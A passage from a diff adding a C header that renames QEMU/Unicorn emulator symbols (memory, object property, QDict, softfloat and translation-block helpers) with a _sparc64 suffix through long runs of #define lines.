memory_region_size_sparc64 
+#define memory_region_to_address_space memory_region_to_address_space_sparc64 +#define memory_region_transaction_begin memory_region_transaction_begin_sparc64 +#define memory_region_transaction_commit memory_region_transaction_commit_sparc64 +#define memory_region_unref memory_region_unref_sparc64 +#define memory_region_update_container_subregions memory_region_update_container_subregions_sparc64 +#define memory_region_write_accessor memory_region_write_accessor_sparc64 +#define memory_region_wrong_endianness memory_region_wrong_endianness_sparc64 +#define memory_try_enable_merging memory_try_enable_merging_sparc64 +#define module_call_init module_call_init_sparc64 +#define module_load module_load_sparc64 +#define mpidr_cp_reginfo mpidr_cp_reginfo_sparc64 +#define mpidr_read mpidr_read_sparc64 +#define msr_mask msr_mask_sparc64 +#define mul128By64To192 mul128By64To192_sparc64 +#define mul128To256 mul128To256_sparc64 +#define mul64To128 mul64To128_sparc64 +#define muldiv64 muldiv64_sparc64 +#define neon_2rm_is_float_op neon_2rm_is_float_op_sparc64 +#define neon_2rm_sizes neon_2rm_sizes_sparc64 +#define neon_3r_sizes neon_3r_sizes_sparc64 +#define neon_get_scalar neon_get_scalar_sparc64 +#define neon_load_reg neon_load_reg_sparc64 +#define neon_load_reg64 neon_load_reg64_sparc64 +#define neon_load_scratch neon_load_scratch_sparc64 +#define neon_ls_element_type neon_ls_element_type_sparc64 +#define neon_reg_offset neon_reg_offset_sparc64 +#define neon_store_reg neon_store_reg_sparc64 +#define neon_store_reg64 neon_store_reg64_sparc64 +#define neon_store_scratch neon_store_scratch_sparc64 +#define new_ldst_label new_ldst_label_sparc64 +#define next_list next_list_sparc64 +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_sparc64 +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_sparc64 +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_sparc64 +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_sparc64 +#define 
normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc64 +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_sparc64 +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_sparc64 +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_sparc64 +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc64 +#define not_v6_cp_reginfo not_v6_cp_reginfo_sparc64 +#define not_v7_cp_reginfo not_v7_cp_reginfo_sparc64 +#define not_v8_cp_reginfo not_v8_cp_reginfo_sparc64 +#define object_child_foreach object_child_foreach_sparc64 +#define object_class_foreach object_class_foreach_sparc64 +#define object_class_foreach_tramp object_class_foreach_tramp_sparc64 +#define object_class_get_list object_class_get_list_sparc64 +#define object_class_get_list_tramp object_class_get_list_tramp_sparc64 +#define object_class_get_parent object_class_get_parent_sparc64 +#define object_deinit object_deinit_sparc64 +#define object_dynamic_cast object_dynamic_cast_sparc64 +#define object_finalize object_finalize_sparc64 +#define object_finalize_child_property object_finalize_child_property_sparc64 +#define object_get_child_property object_get_child_property_sparc64 +#define object_get_link_property object_get_link_property_sparc64 +#define object_get_root object_get_root_sparc64 +#define object_initialize_with_type object_initialize_with_type_sparc64 +#define object_init_with_type object_init_with_type_sparc64 +#define object_instance_init object_instance_init_sparc64 +#define object_new_with_type object_new_with_type_sparc64 +#define object_post_init_with_type object_post_init_with_type_sparc64 +#define object_property_add_alias object_property_add_alias_sparc64 +#define object_property_add_link object_property_add_link_sparc64 +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_sparc64 +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_sparc64 +#define object_property_add_uint64_ptr 
object_property_add_uint64_ptr_sparc64 +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_sparc64 +#define object_property_allow_set_link object_property_allow_set_link_sparc64 +#define object_property_del object_property_del_sparc64 +#define object_property_del_all object_property_del_all_sparc64 +#define object_property_find object_property_find_sparc64 +#define object_property_get object_property_get_sparc64 +#define object_property_get_bool object_property_get_bool_sparc64 +#define object_property_get_int object_property_get_int_sparc64 +#define object_property_get_link object_property_get_link_sparc64 +#define object_property_get_qobject object_property_get_qobject_sparc64 +#define object_property_get_str object_property_get_str_sparc64 +#define object_property_get_type object_property_get_type_sparc64 +#define object_property_is_child object_property_is_child_sparc64 +#define object_property_set object_property_set_sparc64 +#define object_property_set_description object_property_set_description_sparc64 +#define object_property_set_link object_property_set_link_sparc64 +#define object_property_set_qobject object_property_set_qobject_sparc64 +#define object_release_link_property object_release_link_property_sparc64 +#define object_resolve_abs_path object_resolve_abs_path_sparc64 +#define object_resolve_child_property object_resolve_child_property_sparc64 +#define object_resolve_link object_resolve_link_sparc64 +#define object_resolve_link_property object_resolve_link_property_sparc64 +#define object_resolve_partial_path object_resolve_partial_path_sparc64 +#define object_resolve_path object_resolve_path_sparc64 +#define object_resolve_path_component object_resolve_path_component_sparc64 +#define object_resolve_path_type object_resolve_path_type_sparc64 +#define object_set_link_property object_set_link_property_sparc64 +#define object_unparent object_unparent_sparc64 +#define omap_cachemaint_write omap_cachemaint_write_sparc64 +#define 
omap_cp_reginfo omap_cp_reginfo_sparc64 +#define omap_threadid_write omap_threadid_write_sparc64 +#define omap_ticonfig_write omap_ticonfig_write_sparc64 +#define omap_wfi_write omap_wfi_write_sparc64 +#define op_bits op_bits_sparc64 +#define open_modeflags open_modeflags_sparc64 +#define op_to_mov op_to_mov_sparc64 +#define op_to_movi op_to_movi_sparc64 +#define output_type_enum output_type_enum_sparc64 +#define packFloat128 packFloat128_sparc64 +#define packFloat16 packFloat16_sparc64 +#define packFloat32 packFloat32_sparc64 +#define packFloat64 packFloat64_sparc64 +#define packFloatx80 packFloatx80_sparc64 +#define page_find page_find_sparc64 +#define page_find_alloc page_find_alloc_sparc64 +#define page_flush_tb page_flush_tb_sparc64 +#define page_flush_tb_1 page_flush_tb_1_sparc64 +#define page_init page_init_sparc64 +#define page_size_init page_size_init_sparc64 +#define par par_sparc64 +#define parse_array parse_array_sparc64 +#define parse_error parse_error_sparc64 +#define parse_escape parse_escape_sparc64 +#define parse_keyword parse_keyword_sparc64 +#define parse_literal parse_literal_sparc64 +#define parse_object parse_object_sparc64 +#define parse_optional parse_optional_sparc64 +#define parse_option_bool parse_option_bool_sparc64 +#define parse_option_number parse_option_number_sparc64 +#define parse_option_size parse_option_size_sparc64 +#define parse_pair parse_pair_sparc64 +#define parser_context_free parser_context_free_sparc64 +#define parser_context_new parser_context_new_sparc64 +#define parser_context_peek_token parser_context_peek_token_sparc64 +#define parser_context_pop_token parser_context_pop_token_sparc64 +#define parser_context_restore parser_context_restore_sparc64 +#define parser_context_save parser_context_save_sparc64 +#define parse_str parse_str_sparc64 +#define parse_type_bool parse_type_bool_sparc64 +#define parse_type_int parse_type_int_sparc64 +#define parse_type_number parse_type_number_sparc64 +#define parse_type_size 
parse_type_size_sparc64 +#define parse_type_str parse_type_str_sparc64 +#define parse_value parse_value_sparc64 +#define par_write par_write_sparc64 +#define patch_reloc patch_reloc_sparc64 +#define phys_map_node_alloc phys_map_node_alloc_sparc64 +#define phys_map_node_reserve phys_map_node_reserve_sparc64 +#define phys_mem_alloc phys_mem_alloc_sparc64 +#define phys_mem_set_alloc phys_mem_set_alloc_sparc64 +#define phys_page_compact phys_page_compact_sparc64 +#define phys_page_compact_all phys_page_compact_all_sparc64 +#define phys_page_find phys_page_find_sparc64 +#define phys_page_set phys_page_set_sparc64 +#define phys_page_set_level phys_page_set_level_sparc64 +#define phys_section_add phys_section_add_sparc64 +#define phys_section_destroy phys_section_destroy_sparc64 +#define phys_sections_free phys_sections_free_sparc64 +#define pickNaN pickNaN_sparc64 +#define pickNaNMulAdd pickNaNMulAdd_sparc64 +#define pmccfiltr_write pmccfiltr_write_sparc64 +#define pmccntr_read pmccntr_read_sparc64 +#define pmccntr_sync pmccntr_sync_sparc64 +#define pmccntr_write pmccntr_write_sparc64 +#define pmccntr_write32 pmccntr_write32_sparc64 +#define pmcntenclr_write pmcntenclr_write_sparc64 +#define pmcntenset_write pmcntenset_write_sparc64 +#define pmcr_write pmcr_write_sparc64 +#define pmintenclr_write pmintenclr_write_sparc64 +#define pmintenset_write pmintenset_write_sparc64 +#define pmovsr_write pmovsr_write_sparc64 +#define pmreg_access pmreg_access_sparc64 +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_sparc64 +#define pmsav5_data_ap_read pmsav5_data_ap_read_sparc64 +#define pmsav5_data_ap_write pmsav5_data_ap_write_sparc64 +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_sparc64 +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_sparc64 +#define pmuserenr_write pmuserenr_write_sparc64 +#define pmxevtyper_write pmxevtyper_write_sparc64 +#define print_type_bool print_type_bool_sparc64 +#define print_type_int print_type_int_sparc64 +#define print_type_number 
print_type_number_sparc64 +#define print_type_size print_type_size_sparc64 +#define print_type_str print_type_str_sparc64 +#define propagateFloat128NaN propagateFloat128NaN_sparc64 +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_sparc64 +#define propagateFloat32NaN propagateFloat32NaN_sparc64 +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_sparc64 +#define propagateFloat64NaN propagateFloat64NaN_sparc64 +#define propagateFloatx80NaN propagateFloatx80NaN_sparc64 +#define property_get_alias property_get_alias_sparc64 +#define property_get_bool property_get_bool_sparc64 +#define property_get_str property_get_str_sparc64 +#define property_get_uint16_ptr property_get_uint16_ptr_sparc64 +#define property_get_uint32_ptr property_get_uint32_ptr_sparc64 +#define property_get_uint64_ptr property_get_uint64_ptr_sparc64 +#define property_get_uint8_ptr property_get_uint8_ptr_sparc64 +#define property_release_alias property_release_alias_sparc64 +#define property_release_bool property_release_bool_sparc64 +#define property_release_str property_release_str_sparc64 +#define property_resolve_alias property_resolve_alias_sparc64 +#define property_set_alias property_set_alias_sparc64 +#define property_set_bool property_set_bool_sparc64 +#define property_set_str property_set_str_sparc64 +#define pstate_read pstate_read_sparc64 +#define pstate_write pstate_write_sparc64 +#define pxa250_initfn pxa250_initfn_sparc64 +#define pxa255_initfn pxa255_initfn_sparc64 +#define pxa260_initfn pxa260_initfn_sparc64 +#define pxa261_initfn pxa261_initfn_sparc64 +#define pxa262_initfn pxa262_initfn_sparc64 +#define pxa270a0_initfn pxa270a0_initfn_sparc64 +#define pxa270a1_initfn pxa270a1_initfn_sparc64 +#define pxa270b0_initfn pxa270b0_initfn_sparc64 +#define pxa270b1_initfn pxa270b1_initfn_sparc64 +#define pxa270c0_initfn pxa270c0_initfn_sparc64 +#define pxa270c5_initfn pxa270c5_initfn_sparc64 +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_sparc64 
+#define qapi_dealloc_end_list qapi_dealloc_end_list_sparc64 +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_sparc64 +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_sparc64 +#define qapi_dealloc_next_list qapi_dealloc_next_list_sparc64 +#define qapi_dealloc_pop qapi_dealloc_pop_sparc64 +#define qapi_dealloc_push qapi_dealloc_push_sparc64 +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_sparc64 +#define qapi_dealloc_start_list qapi_dealloc_start_list_sparc64 +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_sparc64 +#define qapi_dealloc_start_union qapi_dealloc_start_union_sparc64 +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_sparc64 +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_sparc64 +#define qapi_dealloc_type_int qapi_dealloc_type_int_sparc64 +#define qapi_dealloc_type_number qapi_dealloc_type_number_sparc64 +#define qapi_dealloc_type_size qapi_dealloc_type_size_sparc64 +#define qapi_dealloc_type_str qapi_dealloc_type_str_sparc64 +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_sparc64 +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_sparc64 +#define qapi_free_boolList qapi_free_boolList_sparc64 +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_sparc64 +#define qapi_free_int16List qapi_free_int16List_sparc64 +#define qapi_free_int32List qapi_free_int32List_sparc64 +#define qapi_free_int64List qapi_free_int64List_sparc64 +#define qapi_free_int8List qapi_free_int8List_sparc64 +#define qapi_free_intList qapi_free_intList_sparc64 +#define qapi_free_numberList qapi_free_numberList_sparc64 +#define qapi_free_strList qapi_free_strList_sparc64 +#define qapi_free_uint16List qapi_free_uint16List_sparc64 +#define qapi_free_uint32List qapi_free_uint32List_sparc64 +#define qapi_free_uint64List qapi_free_uint64List_sparc64 +#define qapi_free_uint8List qapi_free_uint8List_sparc64 +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_sparc64 
+#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_sparc64 +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_sparc64 +#define qbool_destroy_obj qbool_destroy_obj_sparc64 +#define qbool_from_int qbool_from_int_sparc64 +#define qbool_get_int qbool_get_int_sparc64 +#define qbool_type qbool_type_sparc64 +#define qbus_create qbus_create_sparc64 +#define qbus_create_inplace qbus_create_inplace_sparc64 +#define qbus_finalize qbus_finalize_sparc64 +#define qbus_initfn qbus_initfn_sparc64 +#define qbus_realize qbus_realize_sparc64 +#define qdev_create qdev_create_sparc64 +#define qdev_get_type qdev_get_type_sparc64 +#define qdev_register_types qdev_register_types_sparc64 +#define qdev_set_parent_bus qdev_set_parent_bus_sparc64 +#define qdev_try_create qdev_try_create_sparc64 +#define qdict_add_key qdict_add_key_sparc64 +#define qdict_array_split qdict_array_split_sparc64 +#define qdict_clone_shallow qdict_clone_shallow_sparc64 +#define qdict_del qdict_del_sparc64 +#define qdict_destroy_obj qdict_destroy_obj_sparc64 +#define qdict_entry_key qdict_entry_key_sparc64 +#define qdict_entry_value qdict_entry_value_sparc64 +#define qdict_extract_subqdict qdict_extract_subqdict_sparc64 +#define qdict_find qdict_find_sparc64 +#define qdict_first qdict_first_sparc64 +#define qdict_flatten qdict_flatten_sparc64 +#define qdict_flatten_qdict qdict_flatten_qdict_sparc64 +#define qdict_flatten_qlist qdict_flatten_qlist_sparc64 +#define qdict_get qdict_get_sparc64 +#define qdict_get_bool qdict_get_bool_sparc64 +#define qdict_get_double qdict_get_double_sparc64 +#define qdict_get_int qdict_get_int_sparc64 +#define qdict_get_obj qdict_get_obj_sparc64 +#define qdict_get_qdict qdict_get_qdict_sparc64 +#define qdict_get_qlist qdict_get_qlist_sparc64 +#define qdict_get_str qdict_get_str_sparc64 +#define qdict_get_try_bool qdict_get_try_bool_sparc64 +#define qdict_get_try_int qdict_get_try_int_sparc64 +#define qdict_get_try_str 
qdict_get_try_str_sparc64 +#define qdict_haskey qdict_haskey_sparc64 +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_sparc64 +#define qdict_iter qdict_iter_sparc64 +#define qdict_join qdict_join_sparc64 +#define qdict_new qdict_new_sparc64 +#define qdict_next qdict_next_sparc64 +#define qdict_next_entry qdict_next_entry_sparc64 +#define qdict_put_obj qdict_put_obj_sparc64 +#define qdict_size qdict_size_sparc64 +#define qdict_type qdict_type_sparc64 +#define qemu_clock_get_us qemu_clock_get_us_sparc64 +#define qemu_clock_ptr qemu_clock_ptr_sparc64 +#define qemu_clocks qemu_clocks_sparc64 +#define qemu_get_cpu qemu_get_cpu_sparc64 +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_sparc64 +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_sparc64 +#define qemu_get_ram_block qemu_get_ram_block_sparc64 +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_sparc64 +#define qemu_get_ram_fd qemu_get_ram_fd_sparc64 +#define qemu_get_ram_ptr qemu_get_ram_ptr_sparc64 +#define qemu_host_page_mask qemu_host_page_mask_sparc64 +#define qemu_host_page_size qemu_host_page_size_sparc64 +#define qemu_init_vcpu qemu_init_vcpu_sparc64 +#define qemu_ld_helpers qemu_ld_helpers_sparc64 +#define qemu_log_close qemu_log_close_sparc64 +#define qemu_log_enabled qemu_log_enabled_sparc64 +#define qemu_log_flush qemu_log_flush_sparc64 +#define qemu_loglevel_mask qemu_loglevel_mask_sparc64 +#define qemu_log_vprintf qemu_log_vprintf_sparc64 +#define qemu_oom_check qemu_oom_check_sparc64 +#define qemu_parse_fd qemu_parse_fd_sparc64 +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc64 +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_sparc64 +#define qemu_ram_alloc qemu_ram_alloc_sparc64 +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc64 +#define qemu_ram_foreach_block qemu_ram_foreach_block_sparc64 +#define qemu_ram_free qemu_ram_free_sparc64 +#define qemu_ram_free_from_ptr 
qemu_ram_free_from_ptr_sparc64 +#define qemu_ram_ptr_length qemu_ram_ptr_length_sparc64 +#define qemu_ram_remap qemu_ram_remap_sparc64 +#define qemu_ram_setup_dump qemu_ram_setup_dump_sparc64 +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_sparc64 +#define qemu_real_host_page_size qemu_real_host_page_size_sparc64 +#define qemu_st_helpers qemu_st_helpers_sparc64 +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_sparc64 +#define qemu_try_memalign qemu_try_memalign_sparc64 +#define qentry_destroy qentry_destroy_sparc64 +#define qerror_human qerror_human_sparc64 +#define qerror_report qerror_report_sparc64 +#define qerror_report_err qerror_report_err_sparc64 +#define qfloat_destroy_obj qfloat_destroy_obj_sparc64 +#define qfloat_from_double qfloat_from_double_sparc64 +#define qfloat_get_double qfloat_get_double_sparc64 +#define qfloat_type qfloat_type_sparc64 +#define qint_destroy_obj qint_destroy_obj_sparc64 +#define qint_from_int qint_from_int_sparc64 +#define qint_get_int qint_get_int_sparc64 +#define qint_type qint_type_sparc64 +#define qlist_append_obj qlist_append_obj_sparc64 +#define qlist_copy qlist_copy_sparc64 +#define qlist_copy_elem qlist_copy_elem_sparc64 +#define qlist_destroy_obj qlist_destroy_obj_sparc64 +#define qlist_empty qlist_empty_sparc64 +#define qlist_entry_obj qlist_entry_obj_sparc64 +#define qlist_first qlist_first_sparc64 +#define qlist_iter qlist_iter_sparc64 +#define qlist_new qlist_new_sparc64 +#define qlist_next qlist_next_sparc64 +#define qlist_peek qlist_peek_sparc64 +#define qlist_pop qlist_pop_sparc64 +#define qlist_size qlist_size_sparc64 +#define qlist_size_iter qlist_size_iter_sparc64 +#define qlist_type qlist_type_sparc64 +#define qmp_input_end_implicit_struct qmp_input_end_implicit_struct_sparc64 +#define qmp_input_end_list qmp_input_end_list_sparc64 +#define qmp_input_end_struct qmp_input_end_struct_sparc64 +#define qmp_input_get_next_type qmp_input_get_next_type_sparc64 +#define qmp_input_get_object qmp_input_get_object_sparc64 
+#define qmp_input_get_visitor qmp_input_get_visitor_sparc64 +#define qmp_input_next_list qmp_input_next_list_sparc64 +#define qmp_input_optional qmp_input_optional_sparc64 +#define qmp_input_pop qmp_input_pop_sparc64 +#define qmp_input_push qmp_input_push_sparc64 +#define qmp_input_start_implicit_struct qmp_input_start_implicit_struct_sparc64 +#define qmp_input_start_list qmp_input_start_list_sparc64 +#define qmp_input_start_struct qmp_input_start_struct_sparc64 +#define qmp_input_type_bool qmp_input_type_bool_sparc64 +#define qmp_input_type_int qmp_input_type_int_sparc64 +#define qmp_input_type_number qmp_input_type_number_sparc64 +#define qmp_input_type_str qmp_input_type_str_sparc64 +#define qmp_input_visitor_cleanup qmp_input_visitor_cleanup_sparc64 +#define qmp_input_visitor_new qmp_input_visitor_new_sparc64 +#define qmp_input_visitor_new_strict qmp_input_visitor_new_strict_sparc64 +#define qmp_output_add_obj qmp_output_add_obj_sparc64 +#define qmp_output_end_list qmp_output_end_list_sparc64 +#define qmp_output_end_struct qmp_output_end_struct_sparc64 +#define qmp_output_first qmp_output_first_sparc64 +#define qmp_output_get_qobject qmp_output_get_qobject_sparc64 +#define qmp_output_get_visitor qmp_output_get_visitor_sparc64 +#define qmp_output_last qmp_output_last_sparc64 +#define qmp_output_next_list qmp_output_next_list_sparc64 +#define qmp_output_pop qmp_output_pop_sparc64 +#define qmp_output_push_obj qmp_output_push_obj_sparc64 +#define qmp_output_start_list qmp_output_start_list_sparc64 +#define qmp_output_start_struct qmp_output_start_struct_sparc64 +#define qmp_output_type_bool qmp_output_type_bool_sparc64 +#define qmp_output_type_int qmp_output_type_int_sparc64 +#define qmp_output_type_number qmp_output_type_number_sparc64 +#define qmp_output_type_str qmp_output_type_str_sparc64 +#define qmp_output_visitor_cleanup qmp_output_visitor_cleanup_sparc64 +#define qmp_output_visitor_new qmp_output_visitor_new_sparc64 +#define qobject_decref 
qobject_decref_sparc64 +#define qobject_to_qbool qobject_to_qbool_sparc64 +#define qobject_to_qdict qobject_to_qdict_sparc64 +#define qobject_to_qfloat qobject_to_qfloat_sparc64 +#define qobject_to_qint qobject_to_qint_sparc64 +#define qobject_to_qlist qobject_to_qlist_sparc64 +#define qobject_to_qstring qobject_to_qstring_sparc64 +#define qobject_type qobject_type_sparc64 +#define qstring_append qstring_append_sparc64 +#define qstring_append_chr qstring_append_chr_sparc64 +#define qstring_append_int qstring_append_int_sparc64 +#define qstring_destroy_obj qstring_destroy_obj_sparc64 +#define qstring_from_escaped_str qstring_from_escaped_str_sparc64 +#define qstring_from_str qstring_from_str_sparc64 +#define qstring_from_substr qstring_from_substr_sparc64 +#define qstring_get_length qstring_get_length_sparc64 +#define qstring_get_str qstring_get_str_sparc64 +#define qstring_new qstring_new_sparc64 +#define qstring_type qstring_type_sparc64 +#define ram_block_add ram_block_add_sparc64 +#define ram_size ram_size_sparc64 +#define range_compare range_compare_sparc64 +#define range_covers_byte range_covers_byte_sparc64 +#define range_get_last range_get_last_sparc64 +#define range_merge range_merge_sparc64 +#define ranges_can_merge ranges_can_merge_sparc64 +#define raw_read raw_read_sparc64 +#define raw_write raw_write_sparc64 +#define rcon rcon_sparc64 +#define read_raw_cp_reg read_raw_cp_reg_sparc64 +#define recip_estimate recip_estimate_sparc64 +#define recip_sqrt_estimate recip_sqrt_estimate_sparc64 +#define register_cp_regs_for_features register_cp_regs_for_features_sparc64 +#define register_multipage register_multipage_sparc64 +#define register_subpage register_subpage_sparc64 +#define register_tm_clones register_tm_clones_sparc64 +#define register_types_object register_types_object_sparc64 +#define regnames regnames_sparc64 +#define render_memory_region render_memory_region_sparc64 +#define reset_all_temps reset_all_temps_sparc64 +#define reset_temp 
reset_temp_sparc64 +#define rol32 rol32_sparc64 +#define rol64 rol64_sparc64 +#define ror32 ror32_sparc64 +#define ror64 ror64_sparc64 +#define roundAndPackFloat128 roundAndPackFloat128_sparc64 +#define roundAndPackFloat16 roundAndPackFloat16_sparc64 +#define roundAndPackFloat32 roundAndPackFloat32_sparc64 +#define roundAndPackFloat64 roundAndPackFloat64_sparc64 +#define roundAndPackFloatx80 roundAndPackFloatx80_sparc64 +#define roundAndPackInt32 roundAndPackInt32_sparc64 +#define roundAndPackInt64 roundAndPackInt64_sparc64 +#define roundAndPackUint64 roundAndPackUint64_sparc64 +#define round_to_inf round_to_inf_sparc64 +#define run_on_cpu run_on_cpu_sparc64 +#define s0 s0_sparc64 +#define S0 S0_sparc64 +#define s1 s1_sparc64 +#define S1 S1_sparc64 +#define sa1100_initfn sa1100_initfn_sparc64 +#define sa1110_initfn sa1110_initfn_sparc64 +#define save_globals save_globals_sparc64 +#define scr_write scr_write_sparc64 +#define sctlr_write sctlr_write_sparc64 +#define set_bit set_bit_sparc64 +#define set_bits set_bits_sparc64 +#define set_default_nan_mode set_default_nan_mode_sparc64 +#define set_feature set_feature_sparc64 +#define set_float_detect_tininess set_float_detect_tininess_sparc64 +#define set_float_exception_flags set_float_exception_flags_sparc64 +#define set_float_rounding_mode set_float_rounding_mode_sparc64 +#define set_flush_inputs_to_zero set_flush_inputs_to_zero_sparc64 +#define set_flush_to_zero set_flush_to_zero_sparc64 +#define set_swi_errno set_swi_errno_sparc64 +#define sextract32 sextract32_sparc64 +#define sextract64 sextract64_sparc64 +#define shift128ExtraRightJamming shift128ExtraRightJamming_sparc64 +#define shift128Right shift128Right_sparc64 +#define shift128RightJamming shift128RightJamming_sparc64 +#define shift32RightJamming shift32RightJamming_sparc64 +#define shift64ExtraRightJamming shift64ExtraRightJamming_sparc64 +#define shift64RightJamming shift64RightJamming_sparc64 +#define shifter_out_im shifter_out_im_sparc64 +#define 
shortShift128Left shortShift128Left_sparc64 +#define shortShift192Left shortShift192Left_sparc64 +#define simple_mpu_ap_bits simple_mpu_ap_bits_sparc64 +#define size_code_gen_buffer size_code_gen_buffer_sparc64 +#define softmmu_lock_user softmmu_lock_user_sparc64 +#define softmmu_lock_user_string softmmu_lock_user_string_sparc64 +#define softmmu_tget32 softmmu_tget32_sparc64 +#define softmmu_tget8 softmmu_tget8_sparc64 +#define softmmu_tput32 softmmu_tput32_sparc64 +#define softmmu_unlock_user softmmu_unlock_user_sparc64 +#define sort_constraints sort_constraints_sparc64 +#define sp_el0_access sp_el0_access_sparc64 +#define spsel_read spsel_read_sparc64 +#define spsel_write spsel_write_sparc64 +#define start_list start_list_sparc64 +#define stb_p stb_p_sparc64 +#define stb_phys stb_phys_sparc64 +#define stl_be_p stl_be_p_sparc64 +#define stl_be_phys stl_be_phys_sparc64 +#define stl_he_p stl_he_p_sparc64 +#define stl_le_p stl_le_p_sparc64 +#define stl_le_phys stl_le_phys_sparc64 +#define stl_phys stl_phys_sparc64 +#define stl_phys_internal stl_phys_internal_sparc64 +#define stl_phys_notdirty stl_phys_notdirty_sparc64 +#define store_cpu_offset store_cpu_offset_sparc64 +#define store_reg store_reg_sparc64 +#define store_reg_bx store_reg_bx_sparc64 +#define store_reg_from_load store_reg_from_load_sparc64 +#define stq_be_p stq_be_p_sparc64 +#define stq_be_phys stq_be_phys_sparc64 +#define stq_he_p stq_he_p_sparc64 +#define stq_le_p stq_le_p_sparc64 +#define stq_le_phys stq_le_phys_sparc64 +#define stq_phys stq_phys_sparc64 +#define string_input_get_visitor string_input_get_visitor_sparc64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_sparc64 +#define string_input_visitor_new string_input_visitor_new_sparc64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_sparc64 +#define strstart strstart_sparc64 +#define strtosz strtosz_sparc64 +#define strtosz_suffix strtosz_suffix_sparc64 +#define stw_be_p stw_be_p_sparc64 +#define stw_be_phys 
stw_be_phys_sparc64 +#define stw_he_p stw_he_p_sparc64 +#define stw_le_p stw_le_p_sparc64 +#define stw_le_phys stw_le_phys_sparc64 +#define stw_phys stw_phys_sparc64 +#define stw_phys_internal stw_phys_internal_sparc64 +#define sub128 sub128_sparc64 +#define sub16_sat sub16_sat_sparc64 +#define sub16_usat sub16_usat_sparc64 +#define sub192 sub192_sparc64 +#define sub8_sat sub8_sat_sparc64 +#define sub8_usat sub8_usat_sparc64 +#define subFloat128Sigs subFloat128Sigs_sparc64 +#define subFloat32Sigs subFloat32Sigs_sparc64 +#define subFloat64Sigs subFloat64Sigs_sparc64 +#define subFloatx80Sigs subFloatx80Sigs_sparc64 +#define subpage_accepts subpage_accepts_sparc64 +#define subpage_init subpage_init_sparc64 +#define subpage_ops subpage_ops_sparc64 +#define subpage_read subpage_read_sparc64 +#define subpage_register subpage_register_sparc64 +#define subpage_write subpage_write_sparc64 +#define suffix_mul suffix_mul_sparc64 +#define swap_commutative swap_commutative_sparc64 +#define swap_commutative2 swap_commutative2_sparc64 +#define switch_mode switch_mode_sparc64 +#define switch_v7m_sp switch_v7m_sp_sparc64 +#define syn_aa32_bkpt syn_aa32_bkpt_sparc64 +#define syn_aa32_hvc syn_aa32_hvc_sparc64 +#define syn_aa32_smc syn_aa32_smc_sparc64 +#define syn_aa32_svc syn_aa32_svc_sparc64 +#define syn_breakpoint syn_breakpoint_sparc64 +#define sync_globals sync_globals_sparc64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_sparc64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_sparc64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_sparc64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_sparc64 +#define syn_data_abort syn_data_abort_sparc64 +#define syn_fp_access_trap syn_fp_access_trap_sparc64 +#define syn_insn_abort syn_insn_abort_sparc64 +#define syn_swstep syn_swstep_sparc64 +#define syn_uncategorized syn_uncategorized_sparc64 +#define syn_watchpoint syn_watchpoint_sparc64 +#define syscall_err syscall_err_sparc64 +#define system_bus_class_init system_bus_class_init_sparc64 +#define 
system_bus_info system_bus_info_sparc64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_sparc64 +#define table_logic_cc table_logic_cc_sparc64 +#define target_parse_constraint target_parse_constraint_sparc64 +#define target_words_bigendian target_words_bigendian_sparc64 +#define tb_add_jump tb_add_jump_sparc64 +#define tb_alloc tb_alloc_sparc64 +#define tb_alloc_page tb_alloc_page_sparc64 +#define tb_check_watchpoint tb_check_watchpoint_sparc64 +#define tb_find_fast tb_find_fast_sparc64 +#define tb_find_pc tb_find_pc_sparc64 +#define tb_find_slow tb_find_slow_sparc64 +#define tb_flush tb_flush_sparc64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_sparc64 +#define tb_free tb_free_sparc64 +#define tb_gen_code tb_gen_code_sparc64 +#define tb_hash_remove tb_hash_remove_sparc64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc64 +#define tb_jmp_cache_hash_func 